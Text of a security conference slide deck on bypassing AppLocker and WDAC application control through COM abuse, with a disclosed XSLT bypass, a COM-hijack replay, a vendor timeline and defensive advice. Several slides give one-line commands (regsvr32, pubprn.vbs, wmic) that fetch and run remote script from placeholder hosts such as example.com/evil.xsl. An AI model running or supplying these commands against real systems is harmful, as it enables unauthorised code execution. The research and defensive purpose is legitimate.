Com Under the Radar

CIRCUMVENTING APPLICATION COM UNDER CONTROL SOLUTIONS THE RADAR

Figure: Game Icons [1] > Whoami ◦ Jimmy Bayne | @bohops ◦ Security Assessor & Researcher @ByLightLLC ◦ From Baltimore, MD area ◦ Towson University Alum ◦ First BSides Talk ◦ Community Projects ◦ Blog | bohops.com ◦ LOLBAS | lolbas-project.github.io

Figure: Global Dispatch [2] > Agenda ◦ COM Overview ◦ Application Control Overview ◦ Application Control Bypasses ◦ Defensive Considerations

…ready…set…go! > COM Overview What is COM? ◦ COM = Component Object Model ◦ A binary interface for software interoperability ◦ Facilitates function calls between components (Middleware) [1] ◦ Technologies – DCOM, OLE, Automation, ActiveX Controls, etc. Terminology ◦ Interface: A definition for exposing COM functionality, including methods and properties ◦ Class: An ‘implementation’ of a group of COM interfaces that serves as a template for a COM object [2] ◦ Object (Component): An instance of a COM class ◦ Instantiation: The creation or activation of an object (instance)

[1] https://www.cs.umd.edu/~pugh/com/ [2] https://docs.microsoft.com/en-us/windows/desktop/com/com-class-objects-and-clsids > COM Overview Registered COM ◦ Registry keys direct the activation of COM objects ◦ COM class data is located in the HKCR Registry hive ◦ The data is merged from the \Software\Classes keys of the HKLM and HKCU hives ◦ Key Values in HKCU take precedence over values in HKLM

◦ Notable key structure in HKCR\CLSID\ ◦ CLSID – Class Identifier ({GUID} Format) ◦ InprocServer32 – In Process Server COM Server Implementation (DLL, OCX) ◦ LocalServer32 – Out-of-Process COM Server Implementation (EXE) ◦ ProgID/VersionIndependentProgID – COM class object friendly name

*Note: There are other interesting keys as well > COM Overview Registered COM

COM Class ID {CLSID}

COM Server In Process Server Binary Path

COM Object Programmatic Friendly Name Identifiers > COM Overview COM Example: COM Object Instantiation “Version Independent” ProgID Friendly Name

Interface ID (IID) [IWshShell3 Interface]

IWshShell3 Interface Methods & Properties

Exec Method Call > COM Overview COM Abuse Vectors ◦ Active Scripting ◦ Script Engines (Languages) – Jscript, VBScript ◦ Script Hosts – (Signed) Binaries that execute script code ◦ ‘Facilitators’ – (Signed) Binaries that ‘enable’ script host-code execution (e.g. lolbins) ◦ PowerShell • COM Functionality • Registration • Resolution • Features/Capabilities > COM Resources

James Forshaw (@tiraniddo) Matt Nelson (@enigma0x3) Rob Maslen (@rbmaslen) Casey Smith (@subTee) https://www.youtube.com/watch?v=dfMuzAZRGm4 https://www.youtube.com/watch?v=3gz1QmiMhss https://www.youtube.com/watch?v=xmbjRP5W-yk

Source: Natty Boh Gear [5] > Application Control Overview Application Control is the practice of restricting unauthorized code execution Approaches ◦ Whitelists ◦ Blocklists ◦ Hybrid Application Control ≈ Application Whitelisting (AWL) Two major Microsoft solutions ◦ AppLocker ◦ WDAC (Device Guard)

Figure: Wikipedia [4] > AppLocker ◦ Available since Windows 2008 Server & Windows 7 Enterprise ◦ Configured through Group Policy ◦ Supported Modes: Enforcement & Audit ◦ Rule Collections: Executable, Installer, Scripts, Packages, DLLs ◦ Rule Conditions: File Hash, Path, & Publisher ◦ Default Rules - Enforced Configuration ◦ Built-In option for setting baseline rule set ◦ Places PowerShell in Constrained Language Mode (CLM) ◦ [-] Not code integrity aware ◦ [-] Not considered a security boundary ◦ [+] Less overhead to implement > WDAC ◦ Available since Windows 2016 Server & Windows 10 Enterprise ◦ Configured through PowerShell cmdlets ◦ Supported Modes: Enforcement & Audit ◦ Rule Conditions: File Hash, File Name, Publisher, Signing Cert, etc. ◦ Default Rules - Enforced Configuration ◦ XML Policy - %systemroot%\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Enforced.xml ◦ Places PowerShell in Constrained Language Mode (CLM) ◦ [+] Code integrity aware (UMCI) ◦ [+] Considered a security boundary ◦ [-] More administrative overhead (maybe…) > PowerShell ◦ PowerShell - “a task-based command-line shell and scripting language built on .NET” (Microsoft Docs) ◦ COM object support (e.g. new-object cmdlet) ◦ Great for Dev/IT Management ◦ (Not so) Great for hackers and Red Teams ◦ PowerShell Version 5(.1) Enhancements ◦ Detection optics (when enabled) ◦ Script block logging, module logging, and transcription ◦ Constrained Language Mode (CLM) support

◦ Restricts sensitive language elements Source: Wiki Media [6] ◦ Not a security boundary ◦ “Implementation” determines effectiveness > COM: Circumventing AppLocker ◦ Default Rules ◦ Gaps in Path rules allow for the execution of any script or executable ◦ Unprivileged users can “write to” interesting paths 

Source: https://gist.github.com/api0cradle/563226464376d40e191ce53abcf9c4d0 > COM: Circumventing AppLocker ◦ 50 Shades of Squiblydoo

◦ Most variants abuse COM/DLL Registration ◦ Leverages scriptlet component files (.sct) and the script(let) run-time component (scrobj.dll) ◦ Component files can create objects and run unsigned script code

Scriptlet Component File (“sct”)

Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/RegSvr32.sct > COM: Circumventing AppLocker 50 Shades of Squiblydoo (Examples) ◦ regsvr32.exe /s /n /u /i:http://url/file.sct scrobj.dll ◦ cscript.exe pubprn.vbs 127.0.0.1 script:http://someurl/file.sct ◦ cmstp.exe /s file.inf ◦ rundll32.exe advpack.dll,LaunchINFSection file.inf,DefaultInstall,1, ◦ rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 c:\path to file.inf

Credits Casey Smith (@subTee) Matt Nelson (@enigma0x3) Nick Tyrer (@NickTyrer) Kyle Hanslovan (@KyleHanslovan) > COM: Circumventing AppLocker XML Stylesheet Transformation (XSLT) ◦ Intended for transforming XML docs into other outputs ◦ Under the hood, variant technique abuses MSXML COM objects (interface methods and properties) ◦ XML Transform functions can execute embedded script code > COM: Circumventing AppLocker XML Stylesheet Transformation (XSLT)

wmic process get /format:”https://example.com/evil.xsl”

http://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html (Credit: Casey Smith - @subTee) > COM: Circumventing AppLocker PowerShell CLM ◦ CLM restricts unapproved script execution, cmdlets, arbitrary types, type definitions, etc. ◦ However, the new-object cmdlet can instantiate COM objects under AppLocker “enforcement” ◦ Example: PowerShell XML Stylesheet Transform > AppLocker Resources

Adam Chester (@_xpn_) Oddvar Moe (@Oddvarmoe) https://blog.xpnsec.com/constrained-language-mode-bypass/ https://www.youtube.com/watch?v=zw21CbNeAjA > COM: Circumventing WDAC Windows Lockdown Policy (WLDP) • is activated when WDAC enforces a code integrity policy (UMCI = Enabled) • is included with “enlightened” script hosts and engines (as wldp.dll) • exports a function called WldpIsClassInApprovedList(), which is called to validate if a CLSID is safe • facilitates the instantiation of a COM (class) object if deemed safe Potential COM WDAC Bypass Conditions • Discovering script hosts that are not WLDP enlightened • Manipulating trusted hosts/scripts/cmdlets to execute arbitrary/unsigned code • Discovering script host/engine WLDP code implementation flaws for evading WldpIsClassInApprovedList() (e.g. false reliance/oversight) • Discovering ‘unsafe’ COM objects that are in the approved list • Re-introducing old code that is still trusted > COM: Circumventing WDAC CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass

◦ Under the WLDP enforced by UMCI, COM object instantiation is locked down to only a few COM objects. When this was initially tested, only the following objects were accessible:

◦ The Microsoft.XMLDOM.1.0 (Microsoft.XMLDOM) object was the most interesting..

Source: https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/ > COM: Circumventing WDAC CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass

◦ A review of the exposed methods revealed various transform* functions > COM: Circumventing WDAC CVE-2018-8492: XML Stylesheet Transformation (XSLT) Bypass

◦ With transformNode and a simple XSLT, we were able to bypass WDAC and execute unsigned script code > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene

◦ After CVE-2018-8492 was patched, the Microsoft.XMLDOM com object could no longer be used to execute scriptlet code under the WDAC policy ◦ Microsoft patched and released a new MSXML3.dll (the COM server) > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene

◦ While re-building a new WDAC test machine, a test case came to mind: WDAC Bypass Replay ◦ For testing, a few versions of previous MSXML3.dll (and dependency) files were copied to the new WDAC test machine. ◦ Interestingly, a previous unpatched DLLs of the same Microsoft build series was still digitally signed > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene

◦ A deeper look into the signature properties confirmed that it was catalog signed as well as revealed the path of the catalog file > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ For testing, the COM Class Registry Keys from HKLM was exported to a .reg file for COM Key Hijacking ◦ Modifications were made for HKCU and the InprocServer32 path to point to the ‘legacy’ binary > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene ◦ After importing the .reg file back into the registry, the COM class keys were “hijacked” and merged with HKCR > COM: Circumventing WDAC AWL Bypass: Catalog Signature Hygiene ◦ Sure enough, a replay of the XSL Transform bypass was successful ◦ The same unsigned script code was executed to bypass the WDAC policy > COM: Circumventing WDAC AWL Bypass: Catalog Hygiene

◦ Timeline ◦ December 2018: MSRC was notified about this issue. A case # was assigned. ◦ March 2019: MSRC case worker stated that a patch and CVE would be issued. ◦ April 2019: MSRC decided not to patch. Block Rules for offending DLLs were added to the WDAC Block Rules Policy.

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block- rules

◦ Future Research Opportunities ◦ Other AWL Bypasses ◦ Trust Subversion ◦ Possibly other use cases and security implications

◦ Trust Subversion References ◦ https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf By Matt Graeber (@mattifestation) > WDAC Resources

Matt Graeber (@mattifestation)

http://www.exploit-monday.com/

James Forshaw (@tiraniddo) Philip Tsukerman (@PhilipTsukerman)

https://www.youtube.com/watch?v=TyMQMFBtU3w https://tyranidslair.blogspot.com/ > Defensive Considerations Application Control (In general…) ◦ A huge security lift and compliments other security controls (EDR, A/V, continuous monitoring, etc.) ◦ Consider evaluating and implementing if you don’t, and continually test and improve enforcement policies if you do PowerShell ◦ Upgrade to version 5+ (and disable v2) ◦ Enable CLM and advanced logging features – script block logging, module logging, and transcription ◦ PowerShell Operational Log Module Events (ID 4103): Identify COM Object Instantiation Events Antivirus (with AMSI support) ◦ MSFT has integrated AMSI with PowerShell (v5), Windows Script Hosts, Jscript, VBscript, Office Macros, .NET (getting there) ◦ There are notable gaps, but organizations should strongly considering A/V vendors that integrate with AMSI EDR/SIEM ◦ Continue monitoring for AWL gaps to have visibility for those (un)known offenders (e.g. script hosts) ◦ Continually test and improve detection efficacy ◦ Keep an eye on the emergence of Event Tracing for Windows (ETW) tools and capabilities > Defensive Considerations Application Control Logging/Monitoring • AppLocker • Location - Event Viewer -> Application and Services Logs -> Microsoft -> Windows -> AppLocker • Log Types - EXE and DLL, MSI and Script, Packaged app-Deployment, and Packaged app-Execution • Use Case - Monitor for blocked execution events • WDAC • Location - Event Viewer -> Application and Services Logs -> Microsoft -> Windows -> Code Integrity -> Operational • Use Case - Monitor for blocked execution events Application Control Policy/Rule Improvement & Testing ◦ AppLocker ◦ AaronLocker [https://github.com/Microsoft/AaronLocker] • WDAC • Recommended Block Rules [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application- control/microsoft-recommended-block-rules] • Patch Management • Testing ◦ PowerAL [https://github.com/api0cradle/PowerAL] ◦ GreatSCT [https://github.com/GreatSCT/GreatSCT] • Red Teaming/Purple Teaming • Mitre ATT&CK testing frameworks > Contact Info • Twitter: @bohops • BloodHound Slack: @bohops > References - Figures 1. GameIcons.net (CC 3.0) - https://game-icons.net/1x1/lorc/radar-sweep.html 2. Global Dispatch - http://www.theglobaldispatch.com/dark-knight-rises-star-tom-hardy-talks- heath-ledger-and-his-bane-costume-90012/ 3. Koadic Github - https://github.com/zerosum0x0/koadic 4. Wikipedia - https://en.wikipedia.org/wiki/Traffic_light#/media/File:Modern_British_LED_Traffic_Light.jp g 5. Natty Boh Gear - https://cdn.shopify.com/s/files/1/2648/0362/collections/HomeGamers- Natty-Boh-Collection-Icon_1200x1200.png 6. Wikimedia - https://upload.wikimedia.org/wikipedia/commons/2/2f/PowerShell_5.0_icon.png > Useful COM Resources ◦ https://en.wikipedia.org/wiki/Component_Object_Model ◦ https://devblogs.microsoft.com/oldnewthing/20151020-00/?p=91321 ◦ https://www.varonis.com/blog/dcom-distributed-component-object-model/ ◦ https://docs.microsoft.com/en-us/cpp/mfc/automation?view=vs-2019 ◦ https://en.wikipedia.org/wiki/ActiveX ◦ https://en.wikipedia.org/wiki/Active_Scripting ◦ https://docs.microsoft.com/en-us/windows/desktop/com/interfaces-and-interface-implementations https://docs.microsoft.com/en-us/windows/desktop/com/com-class-objects-and-clsids ◦ https://docs.microsoft.com/en-us/windows/desktop/learnwin32/creating-an-object-in-com ◦ https://www.cs.umd.edu/~pugh/com/ ◦ https://hackdefense.com/docs/automating-the-enumeration-of-possible-dcom-vulnerabilities-axel- boesenach%20v1.0.pdf ◦ https://stackoverflow.com/questions/2187425/how-do-i-use-a-com-dll-with-loadlibrary-in-c ◦ http://pubs.opengroup.org/onlinepubs/009899899/CHP01CHP.HTM